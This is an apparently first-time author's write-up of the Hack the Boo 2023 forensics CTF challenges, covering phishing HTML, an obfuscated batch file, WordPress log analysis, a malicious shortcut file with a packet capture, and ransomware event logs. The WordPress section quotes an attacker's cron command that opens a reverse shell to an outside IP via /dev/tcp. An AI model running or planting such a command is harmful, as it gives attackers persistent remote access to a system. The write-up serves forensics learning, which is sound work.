Hack the Boo 2023 - Writeups

This is a writeup for all forensics challenges from Hack the Boo 2023. This was also my very first CTF and writeup so the explanations might be super scuffed. With hindsight, the challenges were actually pretty simple but I guess everyone starts from the bottom.

Scenario (Practice Challenges)

Prepare yourselves, travelers!

Creatures have been stirring in the depths of night. Monstrosities emboldened by the lack of monster slayers have heard their names spoken under fearful breaths. As the Hack The Boo tales are brought to life over a campfire, the unsuspecting villagers cling to the light of the fire in hopes of an even brighter dawn.

The elders are here to guide you in your battles…

Spooky Phishing [Forensics]

Question: A few citizens of the Spooky Country have been victims of a targeted phishing campaign. Inspired by the Halloween spirit, none of them was able to detect attackers trap. Can you analyze the malicious attachment and find the URL for the next attack stage?

Flag: HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}

We are given a HTML page that contains the phishing mechanism. Analyzing its source code, several base64 encoded text can be identified. After decoding them, another Javascript script can be obtained.

Notice how the Javascript script initiates two variables, nn and aa. These variables contain the result of the decodeHex function given the two hidden values as parameter each time, after the result of the atob function. atob decodes data that has been encoded with base64.

One way is to analyze the decodeHex function. By concatenating and decoding the two hidden strings .li and .il in the HTML code, the flag can be obtained.

Another way is to just enter the website as it will redirect us to an error page with the flag present in its URL. However, this was just an error from HTB after getting confirmation from a HTB staff on Discord.

Bat Problems [Forensics]

Question: On a chilly Halloween night, the town of Hollowville was shrouded in a veil of mystery. The infamous “Haunted Hollow House”, known for its supernatural tales, concealed a cryptic document. Whispers in the town suggested that the one who could solve its riddle would reveal a beacon of hope. As an investigator, your mission is to decipher the script’s enigmatic sorcery, break the curse, and unveil the flag to become Hollowville’s savior.

Flag: HTB{0bfusc4t3d_b4t_f1l3s_c4n_b3_4_m3ss}

We are given a malicious bat file called payload.bat. The script contains random variables that are assigned with random values.

The file can be analyzed using Any.Run, the results show three actions made:

1. CMD was used to copy PowerShell to a different path with a random name (Earttxmxaqr.png).
2. CMD was used again to change the file’s extension (Earttxmxaqr.png.bat) to avoid detection.
3. The PowerShell executable executes the base64 encoded string.

So by decoding the string, the flag can be obtained.

Vulnerable Season [Forensics]

Question: Halloween season is a very busy season for all of us. Especially for web page administrators. Too many Halloween-themed parties to attend, too many plugins to manage. Unfortunately, our admin didn’t update the plugins used by our WordPress site and as a result, we got pwned. Can you help us investigate the incident by analyzing the web server logs?

Flag: HTB{L0g_@n4ly5t_4_bEg1nN3r}

We are given a Wordpress server log file to analyze. Analyzing the logs, 82.179.92.206 has performed the most requests out of the IP addresses, indicating a suspicious activity. So we can find the amount of times an IP addresses was involved by the number of requests.

cat access.log | cut -d " " -f 1 | sort | uniq -c

Reading the question, it mentioned that the attacker may have exploited a vulnerability in a plugin. Hence, the search can be easier by filtering the logs using /wordpress/wp-content/plugins/ which is the directory storing all the plugins. Requests from the attacker with response status code of 200 can show whether the attacker’s attempts were successful.

By analyzing the logs, notice how some requests suggest that the attacker has exploited the wp-upg plugin since the plugin was responding with 200 OK messages. Additionally, wp-upg has certain vulnerabilities such as CVE-2022-4060 and CVE-2023-0039

After identifying the vulnerable plugin, the logs are analyzed further and another important log was found. These requests indicate the attacker was attempting to execute arbitrary commands on the system.

One of the requests creates a cron job named testconnect that connects to a C2 server and prints the flag.

At this point, I was stuck and required help from the HTB writeup. I found out that to retrieve the flag was to decode the URL using the testconnect cron job again.

echo "sh -i >& /dev/tcp/82.179.92.206/7331 0>&1" > /etc/cron.daily/testconnect && Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev

Scenario (Competition Challenges)

Are you afraid of the dark?

A fog begins to hang over the villagers, as the denizens of the night have sensed their location deep in the forest. Tooth, claw, and hoof press forward to devour their prey.A grim future awaits our stalwart storytellers. It’s up to you, slayers!

Crush this CTF and save the villagers from their peril. Beware! You won’t be getting any help here…

Trick or Treat [Forensics]

Question: Another night staying alone at home during Halloween. But someone wanted to play a Halloween game with me. They emailed me the subject “Trick or Treat” and an attachment. When I opened the file, a black screen appeared for a second on my screen. It wasn’t so scary; maybe the season is not so spooky after all.

Flag: HTB{s4y_Pumpk1111111n!!!}

We are a pcap file and a malicious lnk file called trick_or_treat.lnk. Analyzing the malicious file on VirusTotal, it shows a connection was made to a domain called windowsliveupdater.com. We also can notice connections made to several IP addresses, mainly 209.197.3.8.

The malicious file seems to download data from http://windowsliveupdater.com using a random User-Agent for HTTP requests to essentially mask its identity on the network. It then sets the downloaded data into a variable $vurnwos and processes the characters in pairs and converts them from hexadecimal representation to their actual characters. It then performs a bitwise XOR operation with 0x1d on each character and the output is appended to $vurnwos. Finally, it executes the variable and also attempts to execute an empty variable $asvods.

After knowing what the malicious file does, the packet capture file can be analyzed using Wireshark to find the downloaded content. Since we know that the malicious file requested data from a website, we can filter HTTP packets only.

Going through the HTTP packets, we find a packet that shows the victim sending a GET request to http://windowsliveupdater.com. Analyzing the User-Agent, we can see that it is one of the randomized user agents set in the malicious file.

Now we know that that the IP address 77.74.198.52 is responsible for the malicious file execution, we can check its HTTP response. Cleartext data can be found in the packet and it must be extracted using the decoding method specified in the malicious file.

Since we know that the downloable content is encoded in hex and also XOR’ed, the flag can be obtained after decoding.

Valhalloween [Forensics]

Question: As I was walking the neighbor’s streets for some Trick-or-Treat, a strange man approached me, saying he was dressed as “The God of Mischief!”. He handed me some candy and disappeared. Among the candy bars was a USB in disguise, and when I plugged it into my computer, all my files were corrupted! First, spawn the haunted Docker instance and connect to it! Dig through the horrors that lie in the given Logs and answer whatever questions are asked of you!

Flag: HTB{N0n3_c4n_ru1n_th3_H@ll0w33N_Sp1r1t}

We are given a directory containing Windows event logs. In this challenge, a series of questions must be answered to obtain the flag.

1. Analyzing the Security file, we can filter the logs with event ID 4688 to identify what new processes were created. Filtering the results, we find a Powershell script that was executed to download the ransomware mscalc.exe from a C2 server with its IP address and port. Additionally, the timeline of IoC can be identified to be around 20/9/2023 11:03:24.

1. Analyzing the sysmon file, we can filter the logs with event ID 1 to identify what new processes were created. Since we know the Powershell script downloads the ransomware, we can attempt to find its child processes to locate the creation process of the ransomware. After analyzing the logs, we can find the ransomware with its MD5 hash.

1. Just put the ransomware’s MD5 hash to VirusTotal and check its family labels.

1. Analyzing the sysmon file again, we can filter the logs with the keyword schtasks to identify task scheduling processes. After filtering the results, we find a scheduled program with the parent process being the ransomware.

1. Analyzing the sysmon file again, we can analyze the ransomware process to find its parent process name and ID.

1. Analyzing the Security file again, we can use the parent process ID to retrace the steps to the initial stage in the infection chain.

The infection chain would look like this:

WINWORD.EXE with Unexpe.docx (7280) => cmd.exe (8776) => powershell.exe (3856) => mscalc.exe (7528)

1. We can just analyze the document file and find the TimeCreated SystemTime entry (ENSURE THE TIME FORMAT IS IN UTC!!).